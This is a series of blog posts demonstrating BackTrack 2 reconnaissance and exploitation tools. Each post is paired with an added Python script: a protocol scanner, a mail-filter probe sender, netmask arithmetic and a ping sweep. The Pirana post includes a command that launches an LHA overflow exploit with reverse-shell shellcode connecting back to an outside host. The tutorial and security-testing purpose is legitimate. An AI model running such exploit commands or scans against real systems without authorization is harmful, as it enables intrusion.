
Backtrack 2 : Information Gathering –> All –> Protos



Protos is an IP protocol scanner. It sends the target one probe for each of the 256 possible IP protocol numbers and works as a negative scan: a protocol the target does not support should be reported back with an ICMP Destination Unreachable message of type 3, code 2 (protocol unreachable). Protocol numbers that draw no such reply are therefore either supported or filtered somewhere on the path, which is the caveat to keep in mind when reading the output.

Protos in action.

[screenshot: protos]
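The negative-scan logic described above, as an added example in Python that is not protos' own source: one probe per protocol number, and an ICMP type 3 / code 2 reply parsed to recover which protocol the target refused (it sits in the IP header the target quotes back inside the ICMP message). The raw sockets need root; the parser and a constructed sample reply run without it. The addresses 10.0.0.1 (scanner) and 10.0.0.2 (target) are placeholders.

```python
"""IP protocol scan in the style of protos: probe every IP protocol number
and treat an ICMP "destination unreachable / protocol unreachable" reply
(type 3, code 2) as proof that the target does not speak that protocol.
Added example, not protos' own code. The raw sockets need root (CAP_NET_RAW);
parse_icmp_proto_unreach and build_sample_reply run unprivileged."""
import socket
import struct
import time

ICMP_DEST_UNREACH = 3
ICMP_PROTO_UNREACH = 2  # code 2 of type 3


def parse_icmp_proto_unreach(datagram):
    """Take a raw IPv4 datagram as read from an ICMP raw socket and return
    (rejected_protocol, probed_address) if it is a protocol-unreachable
    message, else None. The target quotes our probe's IP header back to us
    after the 8-byte ICMP header: byte 9 of that quoted header is the
    protocol number it refused, bytes 16-19 the address we probed."""
    if len(datagram) < 20:
        return None
    outer_ihl = (datagram[0] & 0x0F) * 4
    icmp = datagram[outer_ihl:]
    if len(icmp) < 8 + 20:  # ICMP header plus the quoted IP header
        return None
    if icmp[0] != ICMP_DEST_UNREACH or icmp[1] != ICMP_PROTO_UNREACH:
        return None
    quoted_ip = icmp[8:]
    return quoted_ip[9], socket.inet_ntoa(quoted_ip[16:20])


def build_sample_reply(rejected_proto, code=ICMP_PROTO_UNREACH):
    """Constructed (not captured) reply from target 10.0.0.2 to scanner
    10.0.0.1 for offline testing: outer IP header, ICMP header, the quoted
    probe header with protocol = rejected_proto, and 8 bytes of its payload.
    Checksums are left zero because the parser does not verify them."""
    ip_fmt = "!BBHHHBBH4s4s"  # ver/ihl tos len id frag ttl proto csum src dst
    quoted = struct.pack(ip_fmt, 0x45, 0, 28, 0, 0, 64, rejected_proto, 0,
                         socket.inet_aton("10.0.0.1"), socket.inet_aton("10.0.0.2"))
    icmp = struct.pack("!BBHI", ICMP_DEST_UNREACH, code, 0, 0)
    total = 20 + len(icmp) + len(quoted) + 8
    outer = struct.pack(ip_fmt, 0x45, 0, total, 0, 0, 64, socket.IPPROTO_ICMP, 0,
                        socket.inet_aton("10.0.0.2"), socket.inet_aton("10.0.0.1"))
    return outer + icmp + quoted + b"\x00" * 8


def scan(target, timeout=3.0, protocols=range(256)):
    """Probe every protocol number and return {proto: verdict}. Only a
    protocol-unreachable reply is conclusive; silence means the target
    accepted the packet, a firewall dropped it, or the target's ICMP error
    rate limit swallowed the reply, so those are reported as one class."""
    target = socket.gethostbyname(target)
    verdict = {p: "no reply: supported or filtered" for p in protocols}
    listener = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
    listener.settimeout(0.2)
    for proto in protocols:
        try:
            probe = socket.socket(socket.AF_INET, socket.SOCK_RAW, proto)
            probe.sendto(b"\x00" * 8, (target, 0))  # kernel builds the IP header
            probe.close()
        except OSError as e:
            verdict[proto] = f"not probed: {e}"
        time.sleep(0.01)  # pace probes so ICMP error rate limiting loses fewer replies
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        try:
            data, _ = listener.recvfrom(65535)
        except socket.timeout:
            continue
        parsed = parse_icmp_proto_unreach(data)
        if parsed and parsed[1] == target:
            verdict[parsed[0]] = "unsupported: ICMP protocol unreachable"
    listener.close()
    return verdict


if __name__ == "__main__":
    import sys
    for proto, result in sorted(scan(sys.argv[1]).items()):
        print(f"{proto:3d} {result}")
```

Run it as root with a target address as the only argument. Matching the quoted destination against the target before accepting a reply keeps unrelated ICMP errors (from other hosts, or from the local stack) out of the result.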

That's all!

pavs



Backtrack 2 : Information Gathering –> All –> Pirana



Pirana is an exploitation framework that tests the security of an email content filter. By means of a vulnerability database, the content filter under test is bombarded with emails containing a malicious payload intended to compromise the computing platform. Pirana's goal is to test whether or not any vulnerability exists on the content filtering platform.
(Source: http://www.it-observer.com/tools/34/pirana_smtp_content_exploitation_framework/)

Pirana with all its options:

[screenshot: pirana1]

We will try out some of the options in Pirana. First we have to compile the exploits.

[screenshot: pirana2]

Then we run this command: pirana.pl -e 1 -h linuxhaxor.net -a pavs@linuxhaxor.net -s 0 -l linuxhaxor.net – 80

Here -e selects the exploit; of the six available we are using exploit 1, “LHA get_header Directory name overflow”.

-h is the target host name; -a is the destination e-mail address; -s is the shellcode type (three are available, and we use type 0); finally, -l is the host to connect back to in reverse-shell mode.

We ran the command twice, once with -v to attach the EICAR test file and once without it.

[screenshot: pirana3]

And the outcome:

Tada…

[screenshot: pirana4]

There are many combinations of options to play with, but you get an idea of it once you start playing around with it.
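The delivery side of a run like the one above, as an added example in Python that is not Pirana's code: each probe is one SMTP message carrying an attachment, tagged in the Subject so it can be matched against the gateway's log, optionally with the EICAR test file attached the way the post's -v does, and the SMTP response tells you whether the filter rejected the message in-session or merely accepted it for later scanning. The option letters mirror the post's invocation; the attachment payload, file names, hosts and addresses are placeholders, and no exploit is included.

```python
"""Content-filter probe delivery in the style of a Pirana run: one SMTP
message per probe, a unique tag in the Subject for log correlation, and
optionally the EICAR test string attached (-v). Added example, not
Pirana's own code; payload, file names, hosts and addresses are placeholders."""
import argparse
import smtplib
import uuid
from email.message import EmailMessage

# Standard EICAR test string, split in two so the file holding this script is
# not itself flagged by an on-access scanner. Every AV engine detects it.
EICAR = "X5O!P%@AP[4\\PZX54(P^)7CC)7}$" + "EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"


def build_probe(to_addr, from_addr, payload, filename, tag=None, attach_eicar=False):
    """Build the probe. `payload` (bytes) is handed to the filter as an
    attachment named `filename`; `tag` (random by default) goes in the Subject."""
    tag = tag or uuid.uuid4().hex[:12]
    msg = EmailMessage()
    msg["From"] = from_addr
    msg["To"] = to_addr
    msg["Subject"] = f"probe {tag} {filename}"
    msg.set_content("Content filter probe; match the Subject tag against the filter log.")
    msg.add_attachment(payload, maintype="application", subtype="octet-stream",
                       filename=filename)
    if attach_eicar:
        msg.add_attachment(EICAR.encode("ascii"), maintype="application",
                           subtype="octet-stream", filename="eicar.com")
    return msg


def attachment_names(msg):
    """File names of the message's attachments, in order."""
    return [part.get_filename() for part in msg.iter_attachments()]


def send_probe(msg, host, port=25):
    """Deliver the probe and report the filter's answer at SMTP time as
    (accepted, detail). A 5xx on RCPT or DATA means it was rejected in
    session; 250 only means it was queued, so the mailbox and the filter
    log still have to be checked to see whether it was delivered."""
    try:
        with smtplib.SMTP(host, port, timeout=15) as smtp:
            smtp.send_message(msg)
        return True, "accepted for delivery"
    except smtplib.SMTPRecipientsRefused as e:
        return False, f"recipient refused: {e.recipients}"
    except smtplib.SMTPDataError as e:
        return False, f"rejected after DATA: {e.smtp_code} {e.smtp_error!r}"
    except (smtplib.SMTPException, OSError) as e:
        return False, f"delivery failed: {e}"


def main(argv=None):
    # Option letters follow the post's invocation (-h host, -a address,
    # -v EICAR), so argparse's own -h help switch is disabled.
    parser = argparse.ArgumentParser(add_help=False)
    parser.add_argument("-h", dest="host", required=True, help="SMTP host (the filter)")
    parser.add_argument("-p", dest="port", type=int, default=25)
    parser.add_argument("-a", dest="to_addr", required=True, help="destination address")
    parser.add_argument("-f", dest="from_addr", default="probe@example.invalid")
    parser.add_argument("-v", dest="eicar", action="store_true", help="attach EICAR")
    args = parser.parse_args(argv)
    # Placeholder payload: a harmless file, not an exploit.
    msg = build_probe(args.to_addr, args.from_addr, b"not an archive\n", "probe.bin",
                      attach_eicar=args.eicar)
    ok, detail = send_probe(msg, args.host, args.port)
    print(f"{msg['Subject']}: {'ACCEPTED' if ok else 'BLOCKED'} ({detail})")
    return 0 if ok else 1


if __name__ == "__main__":
    raise SystemExit(main())
```

Invoke it as, for instance, `python3 probe.py -h mailgw.example.invalid -a user@example.invalid -v`; the printed Subject tag is what you then look for in the gateway's quarantine or log to tell a silent drop from a delivery.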

That’s all!

pavs



Backtrack 2 : Information Gathering –> All –> netmask



A netmask is a 32-bit mask used to divide an IP address into a network part and a host part, and so to determine the subnet's available hosts: a mask bit set to 1 marks a network bit, a 0 marks a host bit, and the ones must be contiguous (255.255.255.0 is a valid mask; 255.255.225.0 is not, since 225 is 11100001 in binary). In every subnet two addresses are reserved: the one whose host bits are all 0 is the network address, and the one whose host bits are all 1 is the broadcast address. With the mask 255.255.255.0 on 192.168.1.0 these are 192.168.1.0 and 192.168.1.255, and neither can be assigned to a host. The only exceptions are /31 point-to-point links (RFC 3021) and /32 single addresses, which have no host field to reserve.

Because of my VM setup I couldn't emulate this on BackTrack, but I used something similar in Ubuntu.

[screenshot: netmask]
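The same arithmetic the netmask tool performs, as an added example built on Python's standard library rather than the netmask program's source: validate a dotted mask and turn it into a prefix length, split an address into network, broadcast and usable host range, and summarise an address range into the CIDR blocks that cover it. The addresses used are placeholders.

```python
"""Netmask arithmetic in the spirit of the netmask tool. Added example on the
standard library's ipaddress module, not the netmask program's source."""
import ipaddress


def is_valid_mask(mask):
    """A real netmask is a run of ones followed by a run of zeros.
    255.255.225.0 (225 = 11100001) fails this check."""
    bits = int(ipaddress.IPv4Address(mask))
    ones = bin(bits).count("1")
    return bits == (0xFFFFFFFF << (32 - ones)) & 0xFFFFFFFF


def prefix_length(mask):
    """Dotted mask -> prefix length, e.g. 255.255.255.0 -> 24."""
    if not is_valid_mask(mask):
        raise ValueError(f"{mask} is not a contiguous netmask")
    return bin(int(ipaddress.IPv4Address(mask))).count("1")


def describe(addr, mask):
    """Network, broadcast and usable host range for addr/mask. The reserved
    addresses are host bits all 0 (network) and all 1 (broadcast); /31 and
    /32 have no host field left to reserve, so every address is usable."""
    net = ipaddress.IPv4Network((addr, prefix_length(mask)), strict=False)
    if net.prefixlen <= 30:
        first, last = net.network_address + 1, net.broadcast_address - 1
        usable = net.num_addresses - 2
    else:
        first, last = net.network_address, net.broadcast_address
        usable = net.num_addresses
    return {
        "cidr": str(net),
        "netmask": str(net.netmask),
        "hostmask": str(net.hostmask),
        "network": str(net.network_address),
        "broadcast": str(net.broadcast_address),
        "first_host": str(first),
        "last_host": str(last),
        "usable_hosts": usable,
    }


def range_to_cidr(first, last):
    """Smallest list of CIDR blocks covering first..last inclusive, the kind
    of range-to-CIDR conversion the netmask program offers."""
    return [str(n) for n in ipaddress.summarize_address_range(
        ipaddress.IPv4Address(first), ipaddress.IPv4Address(last))]


if __name__ == "__main__":
    for key, value in describe("192.168.1.37", "255.255.255.0").items():
        print(f"{key:12} {value}")
    print(range_to_cidr("10.0.0.0", "10.0.1.255"))
```

The contiguity check matters in practice: a mistyped mask such as the one in the definition above is accepted by many configuration files and silently produces a network with holes in it.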

That’s it

pavs



Backtrack 2 : Information Gathering –> All –> Netenum



Netenum can be used to produce lists of hosts for other programs. It is not as powerful as other ping-sweep tools, but it is simple. When given a timeout, it uses ICMP echo requests to find the hosts that are up. If you don't supply a timeout, it just prints one IP address per line for the whole target range, so you can feed the output to shell scripts.

[screenshot: netenum]
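The two modes just described, as an added example in Python that is not netenum's source: with no timeout the target range is expanded to one host address per line for other tools; with a timeout every host is pinged concurrently and only those that answered are printed. It assumes the Linux iputils `ping -c 1 -W <seconds>` form and treats network and broadcast addresses as non-hosts for /30 and larger; the target networks are placeholders.

```python
"""Host enumeration in the spirit of netenum: expand a target spec, or
ping-sweep it when a timeout is given. Added example, not netenum's code."""
import ipaddress
import subprocess
from concurrent.futures import ThreadPoolExecutor


def expand(spec):
    """Target spec (single host, a.b.c.d/prefix or a.b.c.d/dotted-mask) ->
    host addresses as strings. Network and broadcast addresses are left out
    for /30 and larger; /31 and /32 have none to leave out."""
    net = ipaddress.IPv4Network(spec, strict=False)
    addresses = [str(a) for a in net]
    return addresses if net.prefixlen >= 31 else addresses[1:-1]


def is_alive(host, timeout):
    """One ICMP echo request; True if the host answered within timeout seconds."""
    result = subprocess.run(
        ["ping", "-c", "1", "-W", str(max(1, int(timeout))), host],
        stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    return result.returncode == 0


def sweep(spec, timeout, workers=64):
    """Ping every host in spec concurrently and return the ones that replied,
    in address order. Hosts that drop echo requests are missed, which is the
    limitation of any ICMP-only sweep; confirm with a port scan if it matters."""
    hosts = expand(spec)
    with ThreadPoolExecutor(max_workers=workers) as pool:
        alive = list(pool.map(lambda h: is_alive(h, timeout), hosts))
    return [h for h, up in zip(hosts, alive) if up]


if __name__ == "__main__":
    import sys
    target = sys.argv[1]
    if len(sys.argv) > 2:
        print("\n".join(sweep(target, float(sys.argv[2]))))
    else:
        print("\n".join(expand(target)))
```

`python3 netenum.py 192.168.1.0/24` lists the 254 host addresses; `python3 netenum.py 192.168.1.0/24 2` prints only those that answered a ping within two seconds, one per line, ready to pipe into the next tool.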

That’s it!

pavs


